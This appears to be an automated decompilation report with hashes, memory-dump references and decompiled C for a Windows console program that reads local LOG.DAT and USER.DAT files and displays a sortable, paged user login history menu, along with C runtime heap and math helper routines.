                                                • API String ID: 129814473-0
                                                • Opcode ID: a3723833a784d0035029f83ddb1f748b61901b88de0fd0e471294b3ec6791ab2
                                                • Instruction ID: 5002ab42a2ee48422dd7b6de1c71efbd61ffdde899e9908cdbb34c2abc2d7ea0
                                                • Opcode Fuzzy Hash: a3723833a784d0035029f83ddb1f748b61901b88de0fd0e471294b3ec6791ab2
                                                • Instruction Fuzzy Hash: E141F5F16307029FE7399F2CC891A7A7BA49FD5320B048B1DE6A6876D1EB74D4408B50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 96%
                                                			E01241D26(void* __ebx, void* __edx, void* __edi, void* _a4, long _a8) {
                                                				void* _t7;
                                                				long _t8;
                                                				intOrPtr* _t9;
                                                				intOrPtr* _t12;
                                                				long _t20;
                                                				long _t31;
                                                
                                                				if(_a4 != 0) {
                                                					_t31 = _a8;
                                                					__eflags = _t31;
                                                					if(_t31 != 0) {
                                                						_push(__ebx);
                                                						while(1) {
                                                							__eflags = _t31 - 0xffffffe0;
                                                							if(_t31 > 0xffffffe0) {
                                                								break;
                                                							}
                                                							__eflags = _t31;
                                                							if(_t31 == 0) {
                                                								_t31 = _t31 + 1;
                                                								__eflags = _t31;
                                                							}
                                                							_t7 = HeapReAlloc( *0x1252a68, 0, _a4, _t31);
                                                							_t20 = _t7;
                                                							__eflags = _t20;
                                                							if(_t20 != 0) {
                                                								L17:
                                                								_t8 = _t20;
                                                							} else {
                                                								__eflags =  *0x1252a64 - _t7;
                                                								if(__eflags == 0) {
                                                									_t9 = E01238EFF(__eflags);
                                                									 *_t9 = E01238F12(GetLastError());
                                                									goto L17;
                                                								} else {
                                                									__eflags = E0123C6EE(_t7, _t31);
                                                									if(__eflags == 0) {
                                                										_t12 = E01238EFF(__eflags);
                                                										 *_t12 = E01238F12(GetLastError());
                                                										L12:
                                                										_t8 = 0;
                                                										__eflags = 0;
                                                									} else {
                                                										continue;
                                                									}
                                                								}
                                                							}
                                                							goto L14;
                                                						}
                                                						E0123C6EE(_t6, _t31);
                                                						 *((intOrPtr*)(E01238EFF(__eflags))) = 0xc;
                                                						goto L12;
                                                					} else {
                                                						E01238F53(_a4);
                                                						_t8 = 0;
                                                					}
                                                					L14:
                                                					return _t8;
                                                				} else {
                                                					return E012377C5(__ebx, __edx, __edi, _a8);
                                                				}
                                                			}










                                                APIs
                                                • _malloc.LIBCMT ref: 01241D32
                                                  • Part of subcall function 012377C5: __FF_MSGBANNER.LIBCMT ref: 012377DC
                                                  • Part of subcall function 012377C5: __NMSG_WRITE.LIBCMT ref: 012377E3
                                                  • Part of subcall function 012377C5: HeapAlloc.KERNEL32(00000000,00000000,00000001,00000000,00000000,00000000,?,0123C5BB,00000000,00000000,00000000,00000000,?,0123BF28,00000018,0124D900), ref: 01237808
                                                • _free.LIBCMT ref: 01241D45
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709383013.0000000001231000.00000020.00020000.sdmp, Offset: 01230000, based on PE: true
                                                • Associated: 00000001.00000002.709376180.0000000001230000.00000002.00020000.sdmp
                                                • Associated: 00000001.00000002.709398870.0000000001248000.00000002.00020000.sdmp
                                                • Associated: 00000001.00000002.709408539.000000000124F000.00000008.00020000.sdmp
                                                • Associated: 00000001.00000002.709417916.0000000001255000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: AllocHeap_free_malloc
                                                • String ID:
                                                • API String ID: 2734353464-0
                                                • Opcode ID: ccd8d4a5751def43bb8f633174a4947b5e6fe562f416e8501ce2be29bf67c11a
                                                • Instruction ID: b533630e41595dafc76d5075909c6c6ece6ac824fed1725904b7007a5323c064
                                                • Opcode Fuzzy Hash: ccd8d4a5751def43bb8f633174a4947b5e6fe562f416e8501ce2be29bf67c11a
                                                • Instruction Fuzzy Hash: 9C11C6F2534313EFDB393FB8A8046793B999F50260F104525FA89DA194DF34E4E09794
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • __startOneArgErrorHandling.LIBCMT ref: 0123860D
                                                  • Part of subcall function 0123E840: __87except.LIBCMT ref: 0123E87B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709383013.0000000001231000.00000020.00020000.sdmp, Offset: 01230000, based on PE: true
                                                • Associated: 00000001.00000002.709376180.0000000001230000.00000002.00020000.sdmp
                                                • Associated: 00000001.00000002.709398870.0000000001248000.00000002.00020000.sdmp
                                                • Associated: 00000001.00000002.709408539.000000000124F000.00000008.00020000.sdmp
                                                • Associated: 00000001.00000002.709417916.0000000001255000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: ErrorHandling__87except__start
                                                • String ID: pow
                                                • API String ID: 2905807303-2276729525
                                                • Opcode ID: 94d0458ce56f14d9088ef7cda2fbcca6fd90b181e8a223b371e88f0592ba9811
                                                • Instruction ID: 619fe3fc2942727e06a91cd8c2fe1a6dcd52868b57d6946b70352e4a71a8e7f7
                                                • Opcode Fuzzy Hash: 94d0458ce56f14d9088ef7cda2fbcca6fd90b181e8a223b371e88f0592ba9811
                                                • Instruction Fuzzy Hash: 53516BE0A39203CADB127B1CD94137E2F94EBC0710F118E69F2D54A2EDEB75C4989B46
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 83%
                                                			E0123347B(void* __ebx, void* __edi, void* __esi, void* __fp0) {
                                                				intOrPtr _t218;
                                                				void* _t228;
                                                				void* _t249;
                                                				void* _t270;
                                                				void* _t283;
                                                				void* _t287;
                                                				void* _t306;
                                                				intOrPtr _t307;
                                                				void* _t309;
                                                				intOrPtr _t310;
                                                				void* _t313;
                                                				void* _t314;
                                                				intOrPtr _t320;
                                                				void* _t336;
                                                				intOrPtr _t364;
                                                				void* _t371;
                                                				intOrPtr _t394;
                                                				void* _t397;
                                                				void* _t421;
                                                				void* _t433;
                                                				void* _t435;
                                                				void* _t436;
                                                				void* _t437;
                                                				void* _t442;
                                                				void* _t443;
                                                				void* _t446;
                                                				void* _t448;
                                                				void* _t450;
                                                				void* _t451;
                                                				void* _t457;
                                                
                                                				L0:
                                                				while(1) {
                                                					L0:
                                                					_t457 = __fp0;
                                                					_t421 = __esi;
                                                					_t397 = __edi;
                                                					_t314 = __ebx;
                                                					 *(_t433 - 8) = 1 +  *(_t433 - 8);
                                                					 *(_t433 - 0xc) = 1 +  *(_t433 - 0xc);
                                                					while(1) {
                                                						L69:
                                                						__eflags =  *(_t433 - 8) -  *(_t433 - 0x14);
                                                						if(__eflags < 0) {
                                                						}
                                                						L70:
                                                						E012312B0(5,  *(_t433 - 0xc) + 0xa);
                                                						_push(1 +  *(_t433 - 8));
                                                						_push("%d.");
                                                						E0123715C(_t314, _t397, _t421, __eflags);
                                                						 *((char*)( *(_t433 - 8) * 0x45 +  *((intOrPtr*)(_t433 - 0x10)) + 0x36)) = 0;
                                                						 *((char*)( *(_t433 - 8) * 0x45 +  *((intOrPtr*)(_t433 - 0x10)) + 0x40)) = 0;
                                                						_t181 = 0x22 +  *(_t433 - 8) * 0x45; // 0x23
                                                						_t270 = E012382C0( *((intOrPtr*)(_t433 - 0x10)) + _t181);
                                                						_t448 = _t435 + 0xc;
                                                						__eflags = _t270 - 0xa;
                                                						if(__eflags < 0) {
                                                							_t336 =  *(_t433 - 8) * 0x45;
                                                							__eflags = _t336;
                                                							_t185 = _t336 + 0x22; // 0x23
                                                							_push( *((intOrPtr*)(_t433 - 0x10)) + _t185);
                                                							E012316A0(_t397, _t421, _t457);
                                                						}
                                                						L72:
                                                						E012312B0(9,  *(_t433 - 0xc) + 0xa);
                                                						_t190 = 0x3b +  *(_t433 - 8) * 0x45; // 0x3c
                                                						_push( *((intOrPtr*)(_t433 - 0x10)) + _t190);
                                                						_t194 = 0x31 +  *(_t433 - 8) * 0x45; // 0x32
                                                						_push( *((intOrPtr*)(_t433 - 0x10)) + _t194);
                                                						_t198 = 0x22 +  *(_t433 - 8) * 0x45; // 0x23
                                                						_push( *((intOrPtr*)(_t433 - 0x10)) + _t198);
                                                						_t202 = 4 +  *(_t433 - 8) * 0x45; // 0x5
                                                						_push( *((intOrPtr*)(_t433 - 0x10)) + _t202);
                                                						_push("%s\t\t%s\t%s\t\t%s");
                                                						E0123715C(_t314, _t397, _t421, __eflags);
                                                						_t435 = _t448 + 0x14;
                                                						__eflags =  *(_t433 - 8) -  *(_t433 - 0x1c) + 9;
                                                						if( *(_t433 - 8) <  *(_t433 - 0x1c) + 9) {
                                                							L74:
                                                							goto L0;
                                                						} else {
                                                							L73:
                                                							 *(_t433 - 0x1c) =  *(_t433 - 0x1c) + 0xa;
                                                						}
                                                						L75:
                                                						_t322 =  *((char*)(_t433 - 1));
                                                						__eflags =  *((char*)(_t433 - 1)) - 0x53;
                                                						if( *((char*)(_t433 - 1)) == 0x53) {
                                                							L77:
                                                							 *(_t433 - 0x34) = 1;
                                                						} else {
                                                							L76:
                                                							__eflags =  *((char*)(_t433 - 1)) - 0x73;
                                                							if( *((char*)(_t433 - 1)) == 0x73) {
                                                								goto L77;
                                                							}
                                                						}
                                                						L78:
                                                						__eflags =  *((char*)(_t433 - 1)) - 0x20;
                                                						if( *((char*)(_t433 - 1)) == 0x20) {
                                                							_t322 =  *(_t433 - 8);
                                                							__eflags =  *(_t433 - 8) -  *(_t433 - 0x14);
                                                							if( *(_t433 - 8) ==  *(_t433 - 0x14)) {
                                                								 *(_t433 - 0x1c) = 0;
                                                							}
                                                						}
                                                						L81:
                                                						__eflags =  *((char*)(_t433 - 1)) - 0x53;
                                                						if(__eflags == 0) {
                                                							L50:
                                                							E012320E0(_t322, _t397, _t421, __eflags, _t457);
                                                							__eflags =  *(_t433 - 0x14) - 0xc;
                                                							if(__eflags >= 0) {
                                                								E012312B0(0xf, 0x15);
                                                								_push("Press SPACE BAR to view more data");
                                                								E0123715C(_t314, _t397, _t421, __eflags);
                                                								_t446 = _t435 + 4;
                                                							} else {
                                                								E012312B0(8, 0x15);
                                                								_push("Press S to toggle Sorting between ascending or descending order.");
                                                								E0123715C(_t314, _t397, _t421, __eflags);
                                                								_t446 = _t435 + 4;
                                                							}
                                                							L53:
                                                							E012312B0(5, 8);
                                                							_push("SN\t User Name\tDate\t\tStart time\tEnd Time");
                                                							E0123715C(_t314, _t397, _t421, __eflags);
                                                							_t435 = _t446 + 4;
                                                							E012312B0(4, 9);
                                                							 *(_t433 - 8) = 0;
                                                							while(1) {
                                                								L55:
                                                								__eflags =  *(_t433 - 8) - 0x46;
                                                								if(__eflags >= 0) {
                                                									break;
                                                								}
                                                								L56:
                                                								_push(0xc4);
                                                								_push("%c");
                                                								E0123715C(_t314, _t397, _t421, __eflags);
                                                								_t435 = _t435 + 8;
                                                								L54:
                                                								_t287 = 1 +  *(_t433 - 8);
                                                								__eflags = _t287;
                                                								 *(_t433 - 8) = _t287;
                                                							}
                                                							L57:
                                                							__eflags =  *(_t433 - 0x34);
                                                							if( *(_t433 - 0x34) != 0) {
                                                								L58:
                                                								 *(_t433 - 8) =  *(_t433 - 0x14) - 1;
                                                								while(1) {
                                                									L60:
                                                									__eflags =  *(_t433 - 8);
                                                									if( *(_t433 - 8) < 0) {
                                                										break;
                                                									}
                                                									L61:
                                                									_t421 =  *(_t433 - 8) * 0x45 +  *((intOrPtr*)(_t433 - 0x10));
                                                									memcpy(( *(_t433 - 0x14) -  *(_t433 - 8) - 1) * 0x45 +  *((intOrPtr*)(_t433 - 0x24)), _t421, 0x11 << 2);
                                                									_t435 = _t435 + 0xc;
                                                									_t397 = _t421 + 0x22;
                                                									asm("movsb");
                                                									L59:
                                                									_t371 =  *(_t433 - 8) - 1;
                                                									__eflags = _t371;
                                                									 *(_t433 - 8) = _t371;
                                                								}
                                                								L62:
                                                								 *(_t433 - 8) = 0;
                                                								while(1) {
                                                									L64:
                                                									__eflags =  *(_t433 - 8) -  *(_t433 - 0x14);
                                                									if( *(_t433 - 8) >=  *(_t433 - 0x14)) {
                                                										goto L66;
                                                									}
                                                									L65:
                                                									_t421 =  *(_t433 - 8) * 0x45 +  *((intOrPtr*)(_t433 - 0x24));
                                                									memcpy( *(_t433 - 8) * 0x45 +  *((intOrPtr*)(_t433 - 0x10)), _t421, 0x11 << 2);
                                                									_t435 = _t435 + 0xc;
                                                									_t397 = _t421 + 0x22;
                                                									asm("movsb");
                                                									L63:
                                                									_t283 = 1 +  *(_t433 - 8);
                                                									__eflags = _t283;
                                                									 *(_t433 - 8) = _t283;
                                                								}
                                                							}
                                                							L66:
                                                							__eflags =  *(_t433 - 0x1c) -  *(_t433 - 0x14);
                                                							if( *(_t433 - 0x1c) >  *(_t433 - 0x14)) {
                                                								 *(_t433 - 0x1c) = 0;
                                                							}
                                                							L68:
                                                							 *(_t433 - 8) =  *(_t433 - 0x1c);
                                                							 *(_t433 - 0xc) = 0;
                                                							L69:
                                                							__eflags =  *(_t433 - 8) -  *(_t433 - 0x14);
                                                							if(__eflags < 0) {
                                                							}
                                                							goto L75;
                                                						}
                                                						L82:
                                                						_t249 =  *((char*)(_t433 - 1));
                                                						__eflags = _t249 - 0x73;
                                                						if(__eflags == 0) {
                                                							goto L50;
                                                						}
                                                						L83:
                                                						_t322 =  *((char*)(_t433 - 1));
                                                						__eflags =  *((char*)(_t433 - 1)) - 0x20;
                                                						if(__eflags == 0) {
                                                							goto L50;
                                                						}
                                                						L84:
                                                						while(1) {
                                                							L86:
                                                							__eflags = 1;
                                                							if(1 == 0) {
                                                								break;
                                                							}
                                                							L1:
                                                							 *(_t433 - 8) = 0;
                                                							 *(_t433 - 0x28) = 0;
                                                							 *(_t433 - 0x1c) = 0;
                                                							 *(_t433 - 0x34) = 0;
                                                							_t218 = E01236EF1("LOG.DAT", "r");
                                                							_t436 = _t435 + 8;
                                                							 *0x1252f20 = _t218;
                                                							while(1) {
                                                								L2:
                                                								_push( *((intOrPtr*)(_t433 - 0x18)) + 0x3b +  *(_t433 - 8) * 0x45);
                                                								_push( *((intOrPtr*)(_t433 - 0x18)) + 0x31 +  *(_t433 - 8) * 0x45);
                                                								_push( *((intOrPtr*)(_t433 - 0x18)) + 0x22 +  *(_t433 - 8) * 0x45);
                                                								_t320 =  *0x1252f20; // 0x0
                                                								_t228 = E01237021(_t320, "%s %s %s %s\n",  *(_t433 - 8) * 0x45 +  *((intOrPtr*)(_t433 - 0x18)));
                                                								_t437 = _t436 + 0x18;
                                                								if(_t228 == 0xffffffff) {
                                                									break;
                                                								}
                                                								L3:
                                                								_t307 = E01236EF1("USER.DAT", "r");
                                                								_t450 = _t437 + 8;
                                                								 *0x1252f28 = _t307;
                                                								while(1) {
                                                									L4:
                                                									_push(_t433 - 0x78);
                                                									_push(_t433 - 0x58);
                                                									_t394 =  *0x1252f28; // 0x0
                                                									_t309 = E01237021(_t394, "%s %s %s\n", _t433 - 0x38);
                                                									_t451 = _t450 + 0x14;
                                                									if(_t309 == 0xffffffff) {
                                                										break;
                                                									}
                                                									L5:
                                                									_t313 = E01238230( *(_t433 - 8) * 0x45 +  *((intOrPtr*)(_t433 - 0x18)), _t433 - 0x38);
                                                									_t450 = _t451 + 8;
                                                									if(_t313 == 0) {
                                                										 *(_t433 - 8) = 1 +  *(_t433 - 8);
                                                									}
                                                								}
                                                								L8:
                                                								_t310 =  *0x1252f28; // 0x0
                                                								_push(_t310);
                                                								E01236DB6(_t314, _t397, _t421, __eflags);
                                                								_t436 = _t451 + 4;
                                                							}
                                                							L9:
                                                							 *(_t433 - 0x30) =  *(_t433 - 8);
                                                							_t364 =  *0x1252f20; // 0x0
                                                							_push(_t364);
                                                							E01236DB6(_t314, _t397, _t421, __eflags);
                                                							E012320E0( *(_t433 - 8), _t397, _t421, __eflags, _t457);
                                                							E012312B0(0x1e, 8);
                                                							_push("1. View by USER NAME");
                                                							E0123715C(_t314, _t397, _t421, __eflags);
                                                							E012312B0(0x1e, 0xa);
                                                							_push("2. View by DATE");
                                                							E0123715C(_t314, _t397, _t421, __eflags);
                                                							E012312B0(0x1e, 0xc);
                                                							_push("3. View ALL User history");
                                                							E0123715C(_t314, _t397, _t421, __eflags);
                                                							E012312B0(0x1e, 0xe);
                                                							_push("4. Return to main menu");
                                                							E0123715C(_t314, _t397, _t421, __eflags);
                                                							_t442 = _t437 + 0x14;
                                                							E012312B0(1, 0xf);
                                                							 *(_t433 - 8) = 0;
                                                							while(1) {
                                                								L11:
                                                								__eflags =  *(_t433 - 8) - 0x4e;
                                                								if(__eflags >= 0) {
                                                									break;
                                                								}
                                                								L12:
                                                								_push("_");
                                                								E0123715C(_t314, _t397, _t421, __eflags);
                                                								_t442 = _t442 + 4;
                                                								_t306 = 1 +  *(_t433 - 8);
                                                								__eflags = _t306;
                                                								 *(_t433 - 8) = _t306;
                                                							}
                                                							L13:
                                                							E012312B0(0x17, 0x11);
                                                							_push(" Press a number between the range [1 -4]  ");
                                                							E0123715C(_t314, _t397, _t421, __eflags);
                                                							_t443 = _t442 + 4;
                                                							 *(_t433 - 0xc) = 0;
                                                							_t322 =  *(_t433 - 0xc);
                                                							 *((char*)(_t433 - 2)) =  *(_t433 - 0xc);
                                                							E012320E0( *(_t433 - 0xc), _t397, _t421, __eflags, _t457);
                                                							 *(_t433 - 0x20) =  *((char*)(_t433 - 2));
                                                							 *(_t433 - 0x20) =  *(_t433 - 0x20) - 1;
                                                							__eflags =  *(_t433 - 0x20) - 3;
                                                							if(__eflags > 0) {
                                                								L38:
                                                								E012320E0(_t322, _t397, _t421, __eflags, _t457);
                                                								E012312B0(0xa, 0xa);
                                                								_push("Your input is out of range! Enter a choice between 1 to 4!");
                                                								E0123715C(_t314, _t397, _t421, __eflags);
                                                								E012312B0(0xf, 0xc);
                                                								_push("Press ENTER to return to main menu...");
                                                								_t249 = E0123715C(_t314, _t397, _t421, __eflags);
                                                								_t435 = _t443 + 8;
                                                								 *(_t433 - 0x28) = 1;
                                                								goto L39;
                                                							} else {
                                                								L14:
                                                								switch( *((intOrPtr*)( *(_t433 - 0x20) * 4 +  &M012335F8))) {
                                                									case 0:
                                                										L15:
                                                										E012312B0(0x1e, 0xa);
                                                										_push("Enter user name : ");
                                                										E0123715C(_t314, _t397, _t421, __eflags);
                                                										_t365 = _t433 - 0x58;
                                                										_t249 = E0123738B(" %s", _t433 - 0x58);
                                                										_t435 = _t443 + 0xc;
                                                										 *(_t433 - 8) = 0;
                                                										while(1) {
                                                											L17:
                                                											__eflags =  *(_t433 - 8) -  *(_t433 - 0x30);
                                                											if( *(_t433 - 8) >=  *(_t433 - 0x30)) {
                                                												break;
                                                											}
                                                											L18:
                                                											_t365 =  *((intOrPtr*)(_t433 - 0x18)) + 4 +  *(_t433 - 8) * 0x45;
                                                											_t299 = E01238230( *((intOrPtr*)(_t433 - 0x18)) + 4 +  *(_t433 - 8) * 0x45, _t433 - 0x58);
                                                											_t435 = _t435 + 8;
                                                											__eflags = _t299;
                                                											if(_t299 == 0) {
                                                												_t421 =  *(_t433 - 8) * 0x45 +  *((intOrPtr*)(_t433 - 0x18));
                                                												memcpy( *(_t433 - 0xc) * 0x45 +  *((intOrPtr*)(_t433 - 0x10)), _t421, 0x11 << 2);
                                                												_t435 = _t435 + 0xc;
                                                												_t397 = _t421 + 0x22;
                                                												asm("movsb");
                                                												_t303 = 1 +  *(_t433 - 0xc);
                                                												__eflags = _t303;
                                                												 *(_t433 - 0xc) = _t303;
                                                											}
                                                											_t249 = 1 +  *(_t433 - 8);
                                                											__eflags = _t249;
                                                											 *(_t433 - 8) = _t249;
                                                										}
                                                										L21:
                                                										_t322 =  *(_t433 - 0xc);
                                                										 *(_t433 - 0x14) =  *(_t433 - 0xc);
                                                										goto L39;
                                                									case 1:
                                                										do {
                                                											L22:
                                                											__eax = E012312B0(0x1e, 0xa);
                                                											_push("Enter Date (dd/mm/yyyy) : ");
                                                											__eax = E0123715C(__ebx, __edi, __esi, __eflags);
                                                											__esp = __esp + 4;
                                                											__edx = __ebp - 0x58;
                                                											E0123738B(" %s", __ebp - 0x58) = __ebp - 0x58;
                                                											__eflags = E01231E60(__eflags, __ebp - 0x58);
                                                											if(__eflags == 0) {
                                                												__eax = E01231500(__edi, __esi, 0x1e, 0xa, 0x46, 0xa);
                                                												_push(0x124f8b0);
                                                												__eax = E0123715C(__ebx, __edi, __esi, __eflags);
                                                												__esp = __esp + 4;
                                                											}
                                                											__ecx = __ebp - 0x58;
                                                											__eflags = E01231E60(__eflags, __ebp - 0x58);
                                                										} while (__eflags == 0);
                                                										__edx = __ebp - 0x58;
                                                										_push(__ebp - 0x58);
                                                										__eax = E012315D0();
                                                										 *(__ebp - 8) = 0;
                                                										 *(__ebp - 0xc) = 0;
                                                										while(1) {
                                                											L27:
                                                											__ecx =  *(__ebp - 8);
                                                											__eflags =  *(__ebp - 8) -  *((intOrPtr*)(__ebp - 0x30));
                                                											if( *(__ebp - 8) >=  *((intOrPtr*)(__ebp - 0x30))) {
                                                												break;
                                                											}
                                                											L28:
                                                											__edx = __ebp - 0x58;
                                                											 *(__ebp - 8) =  *(__ebp - 8) * 0x45;
                                                											__ecx =  *(__ebp - 0x18);
                                                											__edx =  *(__ebp - 0x18) + 0x22 +  *(__ebp - 8) * 0x45;
                                                											__eax = E01238230( *(__ebp - 0x18) + 0x22 +  *(__ebp - 8) * 0x45, __ebp - 0x58);
                                                											__eflags = __eax;
                                                											if(__eax == 0) {
                                                												 *(__ebp - 8) =  *(__ebp - 8) * 0x45;
                                                												__esi =  *(__ebp - 8) * 0x45 +  *(__ebp - 0x18);
                                                												 *(__ebp - 0xc) =  *(__ebp - 0xc) * 0x45;
                                                												__edi =  *(__ebp - 0xc) * 0x45 +  *((intOrPtr*)(__ebp - 0x10));
                                                												__ecx = 0x11;
                                                												__eax = memcpy( *(__ebp - 0xc) * 0x45 +  *((intOrPtr*)(__ebp - 0x10)), __esi, 0x11 << 2);
                                                												__edi = __esi + __ecx;
                                                												__edi = __esi + __ecx + __ecx;
                                                												__ecx = 0;
                                                												asm("movsb");
                                                												__eax =  *(__ebp - 0xc);
                                                												__eax = 1 +  *(__ebp - 0xc);
                                                												__eflags = __eax;
                                                												 *(__ebp - 0xc) = __eax;
                                                											}
                                                											__eax =  *(__ebp - 8);
                                                											__eax = 1 +  *(__ebp - 8);
                                                											__eflags = __eax;
                                                											 *(__ebp - 8) = __eax;
                                                										}
                                                										L31:
                                                										__ecx =  *(__ebp - 0xc);
                                                										 *(__ebp - 0x14) = __ecx;
                                                										goto L39;
                                                									case 2:
                                                										L32:
                                                										 *(__ebp - 8) = 0;
                                                										while(1) {
                                                											L34:
                                                											__eax =  *(__ebp - 8);
                                                											__eflags =  *(__ebp - 8) -  *((intOrPtr*)(__ebp - 0x30));
                                                											if( *(__ebp - 8) >=  *((intOrPtr*)(__ebp - 0x30))) {
                                                												break;
                                                											}
                                                											L35:
                                                											 *(__ebp - 8) =  *(__ebp - 8) * 0x45;
                                                											__esi =  *(__ebp - 8) * 0x45 +  *(__ebp - 0x18);
                                                											 *(__ebp - 0xc) =  *(__ebp - 0xc) * 0x45;
                                                											__edi =  *(__ebp - 0xc) * 0x45 +  *((intOrPtr*)(__ebp - 0x10));
                                                											__ecx = 0x11;
                                                											__eax = memcpy( *(__ebp - 0xc) * 0x45 +  *((intOrPtr*)(__ebp - 0x10)), __esi, 0x11 << 2);
                                                											__edi = __esi + __ecx;
                                                											__edi = __esi + __ecx + __ecx;
                                                											__ecx = 0;
                                                											asm("movsb");
                                                											__ecx =  *(__ebp - 0xc);
                                                											__ecx = 1 +  *(__ebp - 0xc);
                                                											 *(__ebp - 0xc) = __ecx;
                                                											__edx =  *(__ebp - 8);
                                                											__edx = 1 +  *(__ebp - 8);
                                                											__eflags = __edx;
                                                											 *(__ebp - 8) = __edx;
                                                										}
                                                										L36:
                                                										__edx =  *(__ebp - 0xc);
                                                										 *(__ebp - 0x14) =  *(__ebp - 0xc);
                                                										L39:
                                                										__eflags =  *(_t433 - 0x14);
                                                										if(__eflags == 0) {
                                                											E012320E0(_t322, _t397, _t421, __eflags, _t457);
                                                											E012312B0(0x1b, 0xc);
                                                											_push(0x124f918);
                                                											E0123715C(_t314, _t397, _t421, __eflags);
                                                											_t435 = _t435 + 4;
                                                											_t249 = E01232E80(_t314, _t365, __eflags, _t457);
                                                										}
                                                										__eflags =  *(_t433 - 0x28);
                                                										if( *(_t433 - 0x28) != 0) {
                                                											L85:
                                                											 *(_t433 - 0x28) = 0;
                                                										} else {
                                                											L42:
                                                											 *(_t433 - 8) = 0;
                                                											 *(_t433 - 0xc) =  *(_t433 - 0x14) - 1;
                                                											while(1) {
                                                												L44:
                                                												__eflags =  *(_t433 - 8) -  *(_t433 - 0x14);
                                                												if( *(_t433 - 8) >=  *(_t433 - 0x14)) {
                                                													break;
                                                												}
                                                												L45:
                                                												_t421 =  *(_t433 - 0xc) * 0x45 +  *((intOrPtr*)(_t433 - 0x10));
                                                												memcpy( *(_t433 - 8) * 0x45 +  *((intOrPtr*)(_t433 - 0x24)), _t421, 0x11 << 2);
                                                												_t435 = _t435 + 0xc;
                                                												_t397 = _t421 + 0x22;
                                                												asm("movsb");
                                                												_t322 = 1 +  *(_t433 - 8);
                                                												 *(_t433 - 8) = 1 +  *(_t433 - 8);
                                                												_t391 =  *(_t433 - 0xc) - 1;
                                                												__eflags = _t391;
                                                												 *(_t433 - 0xc) = _t391;
                                                											}
                                                											L46:
                                                											 *(_t433 - 8) = 0;
                                                											while(1) {
                                                												L48:
                                                												__eflags =  *(_t433 - 8) -  *(_t433 - 0x14);
                                                												if(__eflags >= 0) {
                                                													goto L50;
                                                												}
                                                												L49:
                                                												_t421 =  *(_t433 - 8) * 0x45 +  *((intOrPtr*)(_t433 - 0x24));
                                                												memcpy( *(_t433 - 8) * 0x45 +  *((intOrPtr*)(_t433 - 0x10)), _t421, 0x11 << 2);
                                                												_t435 = _t435 + 0xc;
                                                												_t397 = _t421 + 0x22;
                                                												asm("movsb");
                                                												L47:
                                                												_t322 = 1 +  *(_t433 - 8);
                                                												__eflags = _t322;
                                                												 *(_t433 - 8) = _t322;
                                                											}
                                                											goto L50;
                                                										}
                                                										goto L86;
                                                									case 3:
                                                										L37:
                                                										goto L87;
                                                								}
                                                							}
                                                							break;
                                                						}
                                                						L87:
                                                						return _t249;
                                                						L88:
                                                					}
                                                				}
                                                			}

































                                                0x01233083
                                                0x01233088
                                                0x0123308d
                                                0x01233092
                                                0x01233095
                                                0x0123309c
                                                0x0123309f
                                                0x012330a2
                                                0x012330ab
                                                0x012330b4
                                                0x012330b7
                                                0x012330bb
                                                0x0123327b
                                                0x0123327b
                                                0x01233284
                                                0x01233289
                                                0x0123328e
                                                0x0123329a
                                                0x0123329f
                                                0x012332a4
                                                0x012332a9
                                                0x012332ac
                                                0x00000000
                                                0x012330c1
                                                0x012330c1
                                                0x012330c4
                                                0x00000000
                                                0x012330cb
                                                0x012330cf
                                                0x012330d4
                                                0x012330d9
                                                0x012330e1
                                                0x012330ea
                                                0x012330ef
                                                0x012330f2
                                                0x01233104
                                                0x01233104
                                                0x01233107
                                                0x0123310a
                                                0x00000000
                                                0x00000000
                                                0x0123310c
                                                0x01233119
                                                0x0123311e
                                                0x01233123
                                                0x01233126
                                                0x01233128
                                                0x01233130
                                                0x01233141
                                                0x01233141
                                                0x01233141
                                                0x01233143
                                                0x01233147
                                                0x01233147
                                                0x0123314a
                                                0x0123314a
                                                0x012330fe
                                                0x012330fe
                                                0x01233101
                                                0x01233101
                                                0x0123314f
                                                0x0123314f
                                                0x01233152
                                                0x00000000
                                                0x00000000
                                                0x0123315a
                                                0x0123315a
                                                0x0123315e
                                                0x01233163
                                                0x01233168
                                                0x0123316d
                                                0x01233170
                                                0x01233181
                                                0x0123318a
                                                0x0123318c
                                                0x01233196
                                                0x0123319b
                                                0x012331a0
                                                0x012331a5
                                                0x012331a5
                                                0x012331a8
                                                0x012331b1
                                                0x012331b1
                                                0x012331b5
                                                0x012331b8
                                                0x012331b9
                                                0x012331be
                                                0x012331c5
                                                0x012331d7
                                                0x012331d7
                                                0x012331d7
                                                0x012331da
                                                0x012331dd
                                                0x00000000
                                                0x00000000
                                                0x012331df
                                                0x012331df
                                                0x012331e6
                                                0x012331e9
                                                0x012331ec
                                                0x012331f1
                                                0x012331f9
                                                0x012331fb
                                                0x01233200
                                                0x01233203
                                                0x01233209
                                                0x0123320c
                                                0x0123320f
                                                0x01233214
                                                0x01233214
                                                0x01233214
                                                0x01233214
                                                0x01233216
                                                0x01233217
                                                0x0123321a
                                                0x0123321a
                                                0x0123321d
                                                0x0123321d
                                                0x012331ce
                                                0x012331d1
                                                0x012331d1
                                                0x012331d4
                                                0x012331d4
                                                0x01233222
                                                0x01233222
                                                0x01233225
                                                0x00000000
                                                0x00000000
                                                0x0123322d
                                                0x0123322d
                                                0x0123323f
                                                0x0123323f
                                                0x0123323f
                                                0x01233242
                                                0x01233245
                                                0x00000000
                                                0x00000000
                                                0x01233247
                                                0x0123324a
                                                0x0123324d
                                                0x01233253
                                                0x01233256
                                                0x01233259
                                                0x0123325e
                                                0x0123325e
                                                0x0123325e
                                                0x0123325e
                                                0x01233260
                                                0x01233261
                                                0x01233264
                                                0x01233267
                                                0x01233236
                                                0x01233239
                                                0x01233239
                                                0x0123323c
                                                0x0123323c
                                                0x0123326c
                                                0x0123326c
                                                0x0123326f
                                                0x012332b3
                                                0x012332b3
                                                0x012332b7
                                                0x012332b9
                                                0x012332c2
                                                0x012332c7
                                                0x012332cc
                                                0x012332d1
                                                0x012332d4
                                                0x012332d4
                                                0x012332d9
                                                0x012332dd
                                                0x012335dd
                                                0x012335dd
                                                0x012332e3
                                                0x012332e3
                                                0x012332e3
                                                0x012332f0
                                                0x01233307
                                                0x01233307
                                                0x0123330a
                                                0x0123330d
